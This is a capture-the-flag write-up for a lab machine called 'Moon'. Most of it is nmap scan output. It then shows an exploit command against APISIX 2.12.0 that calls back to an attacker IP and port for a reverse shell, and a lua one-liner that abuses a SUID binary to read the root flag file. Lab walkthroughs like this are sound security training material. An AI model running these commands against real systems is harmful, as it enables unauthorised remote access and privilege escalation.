- Published on
Moon Writeup
- Authors
- Name
- Gabriel Silva
- @gabriel-silva-509347165
nmap -sV -sC -p- -v $IP --open
Port Scanning
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c1:fe:c0:85:79:2c:77:d0:06:04:93:1e:b7:5b:55:df (RSA)
| 256 b4:96:88:93:3b:59:e2:ea:11:ae:c9:69:78:9c:a4:6c (ECDSA)
|_ 256 1e:75:3d:55:78:74:36:aa:d1:9e:94:09:70:f5:68:90 (ED25519)
2379/tcp open etcd-client?
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 404 Not Found
| Access-Control-Allow-Headers: accept, content-type, authorization
| Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE
| Access-Control-Allow-Origin: *
| Content-Type: text/plain; charset=utf-8
| X-Content-Type-Options: nosniff
| Date: Fri, 19 Jul 2024 05:15:54 GMT
| Content-Length: 19
| page not found
| GetRequest:
| HTTP/1.0 404 Not Found
| Access-Control-Allow-Headers: accept, content-type, authorization
| Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE
| Access-Control-Allow-Origin: *
| Content-Type: text/plain; charset=utf-8
| X-Content-Type-Options: nosniff
| Date: Fri, 19 Jul 2024 05:15:26 GMT
| Content-Length: 19
| page not found
| HTTPOptions:
| HTTP/1.0 200 OK
| Access-Control-Allow-Headers: accept, content-type, authorization
| Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE
| Access-Control-Allow-Origin: *
| Date: Fri, 19 Jul 2024 05:15:27 GMT
| Content-Length: 0
| docker:
| HTTP/1.1 400 Bad Request: missing required Host header
| Content-Type: text/plain; charset=utf-8
| Connection: close
|_ Request: missing required Host header
3000/tcp open ppp?
| fingerprint-strings:
| GenericLines, Help:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
| Cache-Control: no-cache
| Content-Type: text/html; charset=UTF-8
| Expires: -1
| Pragma: no-cache
| X-Content-Type-Options: nosniff
| X-Xss-Protection: 1; mode=block
| Date: Fri, 19 Jul 2024 05:15:26 GMT
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <script>
| !(function() {
| ('PerformanceLongTaskTiming' in window) {
| (window.__tti = { e: [] });
| PerformanceObserver(function(l) {
| g.e.concat(l.getEntries());
| g.o.observe({ entryTypes: ['longtask'] });
| })();
| </script>
| <meta charset="utf-8" />
| <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
| <meta name="viewport" content="width=device-width" />
| <meta name="theme-color" content="#000" />
| <title>Grafana</title>
| <base href="/" />
| <link
| rel="preload"
| href=
| HTTPOptions:
| HTTP/1.0 404 Not Found
| Cache-Control: no-cache
| Content-Type: text/html; charset=UTF-8
| Expires: -1
| Pragma: no-cache
| X-Content-Type-Options: nosniff
| X-Xss-Protection: 1; mode=block
| Date: Fri, 19 Jul 2024 05:15:32 GMT
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <script>
| !(function() {
| ('PerformanceLongTaskTiming' in window) {
| (window.__tti = { e: [] });
| PerformanceObserver(function(l) {
| g.e.concat(l.getEntries());
| g.o.observe({ entryTypes: ['longtask'] });
| })();
| </script>
| <meta charset="utf-8" />
| <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
| <meta name="viewport" content="width=device-width" />
| <meta name="theme-color" content="#000" />
| <title>Grafana</title>
| <base href="/" />
| <link
|_ rel="preload"
9000/tcp open tcpwrapped
9080/tcp open http OpenResty web app server
|_http-server-header: APISIX/2.12.0
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
9081/tcp open http nginx 1.19.0
|_http-favicon: Unknown favicon MD5: EBC398A521A820550E20D38221AE717E
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.19.0
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
9082/tcp open http nginx 1.19.0
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: A60BE5F4B4EF66A4AF5000B66067DADE
|_http-server-header: nginx/1.19.0
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
9090/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-favicon: Unknown favicon MD5: 5EE43B38986A144D6B5022EA8C8F748F
| http-methods:
|_ Supported Methods: GET OPTIONS
| http-title: Prometheus Time Series Collection and Processing Server
|_Requested resource was /graph
9091/tcp open http OpenResty web app server
|_http-server-header: openresty
|_http-title: 404 Not Found
9443/tcp open ssl/tungsten-https?
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at <https://nmap.org/cgi-bin/submit.cgi?new-service> :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port2379-TCP:V=7.94SVN%I=7%D=7/19%Time=6699F66E%P=x86_64-pc-linux-gnu%r
SF:(docker,A3,"HTTP/1\\.1\\x20400\\x20Bad\\x20Request:\\x20missing\\x20required\\
SF:x20Host\\x20header\\r\\nContent-Type:\\x20text/plain;\\x20charset=utf-8\\r\\nC
SF:onnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Request:\\x20missing\\x20require
SF:d\\x20Host\\x20header")%r(GetRequest,152,"HTTP/1\\.0\\x20404\\x20Not\\x20Foun
SF:d\\r\\nAccess-Control-Allow-Headers:\\x20accept,\\x20content-type,\\x20autho
SF:rization\\r\\nAccess-Control-Allow-Methods:\\x20POST,\\x20GET,\\x20OPTIONS,\\
SF:x20PUT,\\x20DELETE\\r\\nAccess-Control-Allow-Origin:\\x20\\*\\r\\nContent-Type
SF::\\x20text/plain;\\x20charset=utf-8\\r\\nX-Content-Type-Options:\\x20nosniff
SF:\\r\\nDate:\\x20Fri,\\x2019\\x20Jul\\x202024\\x2005:15:26\\x20GMT\\r\\nContent-Le
SF:ngth:\\x2019\\r\\n\\r\\n404\\x20page\\x20not\\x20found\\n")%r(HTTPOptions,ED,"HT
SF:TP/1\\.0\\x20200\\x20OK\\r\\nAccess-Control-Allow-Headers:\\x20accept,\\x20con
SF:tent-type,\\x20authorization\\r\\nAccess-Control-Allow-Methods:\\x20POST,\\x
SF:20GET,\\x20OPTIONS,\\x20PUT,\\x20DELETE\\r\\nAccess-Control-Allow-Origin:\\x2
SF:0\\*\\r\\nDate:\\x20Fri,\\x2019\\x20Jul\\x202024\\x2005:15:27\\x20GMT\\r\\nContent
SF:-Length:\\x200\\r\\n\\r\\n")%r(FourOhFourRequest,152,"HTTP/1\\.0\\x20404\\x20No
SF:t\\x20Found\\r\\nAccess-Control-Allow-Headers:\\x20accept,\\x20content-type,
SF:\\x20authorization\\r\\nAccess-Control-Allow-Methods:\\x20POST,\\x20GET,\\x20
SF:OPTIONS,\\x20PUT,\\x20DELETE\\r\\nAccess-Control-Allow-Origin:\\x20\\*\\r\\nCon
SF:tent-Type:\\x20text/plain;\\x20charset=utf-8\\r\\nX-Content-Type-Options:\\x
SF:20nosniff\\r\\nDate:\\x20Fri,\\x2019\\x20Jul\\x202024\\x2005:15:54\\x20GMT\\r\\nC
SF:ontent-Length:\\x2019\\r\\n\\r\\n404\\x20page\\x20not\\x20found\\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port3000-TCP:V=7.94SVN%I=7%D=7/19%Time=6699F66E%P=x86_64-pc-linux-gnu%r
SF:(GenericLines,67,"HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x
SF:20text/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Ba
SF:d\\x20Request")%r(GetRequest,2F98,"HTTP/1\\.0\\x20200\\x20OK\\r\\nCache-Contr
SF:ol:\\x20no-cache\\r\\nContent-Type:\\x20text/html;\\x20charset=UTF-8\\r\\nExpi
SF:res:\\x20-1\\r\\nPragma:\\x20no-cache\\r\\nX-Content-Type-Options:\\x20nosniff
SF:\\r\\nX-Xss-Protection:\\x201;\\x20mode=block\\r\\nDate:\\x20Fri,\\x2019\\x20Jul
SF:\\x202024\\x2005:15:26\\x20GMT\\r\\n\\r\\n<!DOCTYPE\\x20html>\\n<html\\x20lang=\\"
SF:en\\">\\n\\x20\\x20<head>\\n\\x20\\x20\\x20\\x20<script>\\n\\x20\\x20\\x20\\x20\\x20\\x
SF:20\\n\\x20\\x20\\x20\\x20\\x20\\x20!\\(function\\(\\)\\x20{\\n\\x20\\x20\\x20\\x20\\x20\\
SF:x20\\x20\\x20if\\x20\\('PerformanceLongTaskTiming'\\x20in\\x20window\\)\\x20{\\n
SF:\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20var\\x20g\\x20=\\x20\\(window\\.__tt
SF:i\\x20=\\x20{\\x20e:\\x20\\[\\]\\x20}\\);\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20
SF:\\x20g\\.o\\x20=\\x20new\\x20PerformanceObserver\\(function\\(l\\)\\x20{\\n\\x20\\x
SF:20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20g\\.e\\x20=\\x20g\\.e\\.concat\\(l\\
SF:.getEntries\\(\\)\\);\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20}\\);\\n\\x20\\
SF:x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20g\\.o\\.observe\\({\\x20entryTypes:\\x20\\
SF:['longtask'\\]\\x20}\\);\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20}\\n\\x20\\x20\\x20\\
SF:x20\\x20\\x20}\\)\\(\\);\\n\\n\\x20\\x20\\x20\\x20</script>\\n\\x20\\x20\\x20\\x20<meta
SF:\\x20charset=\\"utf-8\\"\\x20/>\\n\\x20\\x20\\x20\\x20<meta\\x20http-equiv=\\"X-UA
SF:-Compatible\\"\\x20content=\\"IE=edge,chrome=1\\"\\x20/>\\n\\x20\\x20\\x20\\x20<m
SF:eta\\x20name=\\"viewport\\"\\x20content=\\"width=device-width\\"\\x20/>\\n\\x20\\
SF:x20\\x20\\x20<meta\\x20name=\\"theme-color\\"\\x20content=\\"#000\\"\\x20/>\\n\\n\\
SF:x20\\x20\\x20\\x20<title>Grafana</title>\\n\\n\\x20\\x20\\x20\\x20<base\\x20href=
SF:\\"/\\"\\x20/>\\n\\n\\x20\\x20\\x20\\x20<link\\n\\x20\\x20\\x20\\x20\\x20\\x20rel=\\"pre
SF:load\\"\\n\\x20\\x20\\x20\\x20\\x20\\x20href=")%r(Help,67,"HTTP/1\\.1\\x20400\\x20
SF:Bad\\x20Request\\r\\nContent-Type:\\x20text/plain;\\x20charset=utf-8\\r\\nConn
SF:ection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Request")%r(HTTPOptions,2F98,"HTT
SF:P/1\\.0\\x20404\\x20Not\\x20Found\\r\\nCache-Control:\\x20no-cache\\r\\nContent-
SF:Type:\\x20text/html;\\x20charset=UTF-8\\r\\nExpires:\\x20-1\\r\\nPragma:\\x20no
SF:-cache\\r\\nX-Content-Type-Options:\\x20nosniff\\r\\nX-Xss-Protection:\\x201;
SF:\\x20mode=block\\r\\nDate:\\x20Fri,\\x2019\\x20Jul\\x202024\\x2005:15:32\\x20GMT
SF:\\r\\n\\r\\n<!DOCTYPE\\x20html>\\n<html\\x20lang=\\"en\\">\\n\\x20\\x20<head>\\n\\x20
SF:\\x20\\x20\\x20<script>\\n\\x20\\x20\\x20\\x20\\x20\\x20\\n\\x20\\x20\\x20\\x20\\x20\\x2
SF:0!\\(function\\(\\)\\x20{\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20if\\x20\\('Perform
SF:anceLongTaskTiming'\\x20in\\x20window\\)\\x20{\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x2
SF:0\\x20\\x20\\x20var\\x20g\\x20=\\x20\\(window\\.__tti\\x20=\\x20{\\x20e:\\x20\\[\\]\\x
SF:20}\\);\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20g\\.o\\x20=\\x20new\\x20Per
SF:formanceObserver\\(function\\(l\\)\\x20{\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\
SF:x20\\x20\\x20\\x20g\\.e\\x20=\\x20g\\.e\\.concat\\(l\\.getEntries\\(\\)\\);\\n\\x20\\x2
SF:0\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20}\\);\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20
SF:\\x20\\x20g\\.o\\.observe\\({\\x20entryTypes:\\x20\\['longtask'\\]\\x20}\\);\\n\\x20
SF:\\x20\\x20\\x20\\x20\\x20\\x20\\x20}\\n\\x20\\x20\\x20\\x20\\x20\\x20}\\)\\(\\);\\n\\n\\x20
SF:\\x20\\x20\\x20</script>\\n\\x20\\x20\\x20\\x20<meta\\x20charset=\\"utf-8\\"\\x20/>
SF:\\n\\x20\\x20\\x20\\x20<meta\\x20http-equiv=\\"X-UA-Compatible\\"\\x20content=\\"
SF:IE=edge,chrome=1\\"\\x20/>\\n\\x20\\x20\\x20\\x20<meta\\x20name=\\"viewport\\"\\x2
SF:0content=\\"width=device-width\\"\\x20/>\\n\\x20\\x20\\x20\\x20<meta\\x20name=\\"
SF:theme-color\\"\\x20content=\\"#000\\"\\x20/>\\n\\n\\x20\\x20\\x20\\x20<title>Grafa
SF:na</title>\\n\\n\\x20\\x20\\x20\\x20<base\\x20href=\\"/\\"\\x20/>\\n\\n\\x20\\x20\\x20
SF:\\x20<link\\n\\x20\\x20\\x20\\x20\\x20\\x20rel=\\"preload\\"\\n\\x20\\x20\\x20\\x20");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap foudn the ports 22(SSH), 2379, 3000, 9000, 9080(HTTP), 9081(HTTP), 9091(HTTP) e 9443(HTTPS) opned.
Enumeration
To keep the write-up shorter, we will go straight to the port that matters, which is 9080 (APISIX).
Apache APISIX is a high-performance, dynamic, and real-time API gateway. It offers advanced traffic management features like load balancing, dynamic upstream, canary releases, circuit breaking, authentication, etc.
We can check the APISIX version by performing banner grabbing with curl (nmap also found the version).
curl -I http://172.16.4.86:9080 
This version APISIX/2.12.0 is vulnerable to RCE (Remote Code Execution).
searchsploit APISIX 
Foot Hold
python3 50829.py <http://172.16.4.89:9080/> 10.0.31.150 1337 
"Privillege Escalation"
SUID /usr/bin/lua
find / -perm -u=s -type f 2>/dev/null 
https://gtfobins.github.io/gtfobins/lua/#suid
lua -e 'local f=io.open("/root/root.txt", "rb"); print(f:read("*a")); io.close(f);' 
Proof
